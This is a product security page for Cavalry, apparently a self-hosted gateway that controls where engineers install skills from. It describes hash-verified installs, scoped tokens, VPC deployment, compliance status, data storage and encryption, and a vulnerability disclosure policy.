Cavalry

Security

Security is operational, not a PDF.

Cavalry is the single enforcement point between your engineers and every public or private skill source. Here is the posture that ships with the product, plus the channel for reporting issues.

01 · Integrity

Every artifact is content-addressed.

Skills resolve by sha256, not by mutable tag. The CLI streams and verifies the hash on install; a mismatch fails closed before any code reaches the workspace.

  • sha256 resolution end to end
  • Streaming verification on install
  • Append-only audit on every fetch
02 · Identity

Actor identity is preserved, row by row.

Every governed event records user, token, and system context. API tokens are scoped to a workspace and skill namespace — leaked tokens cannot escalate laterally.

  • User · token · system on each row
  • Workspace-scoped API tokens
  • Signed webhook delivery to your SIEM
03 · Isolation

Runs in your VPC, on your Postgres.

Apache-licensed, Helm chart included, no telemetry home. S3-compatible object storage, Postgres primary, Redis optional for ratelimits.

  • Self-host by default
  • No vendor phone-home
  • Bring your own Postgres · S3 · KMS
04 · Posture

Compliance tracks the product, not the reverse.

SOC 2 Type I is in flight for the managed tier. Self-hosted deploys inherit your environment's controls; Cavalry publishes the mapping.

  • SOC 2 Type I · in progress · 2026 Q3
  • Data residency: you pick the region
  • Apache 2.0 source · third-party audit welcome

Data model

What Cavalry stores, where it stores it.

The gateway holds policy, audit, and skill metadata. Artifacts live in object storage you control. Nothing else.

Data at rest
Postgres (encrypted via the storage layer you provide). Artifacts in S3-compatible object storage with server-side encryption.
Data in transit
TLS 1.2+ terminates at your ingress. Internal gateway-to-database traffic honors your VPC policies.
Secrets
API tokens are stored hashed (argon2). Upstream registry credentials live in the secret backend you configure — not in the database.
Retention
Audit rows are append-only. Soft-delete does not apply. Retention windows are configurable per org; the default is indefinite.

Reporting

Found something? Tell us first.

Report to security@cavalry.sh with repro steps and impact. A human replies within one business day; a fix or mitigation plan follows within seven.

security@cavalry.shPrivate advisory
Disclosure window
90 days from triage · extensions by agreement
Safe harbor
Good-faith reports get public credit, no takedown threats
Out of scope
DoS, social engineering, physical attacks, third-party SaaS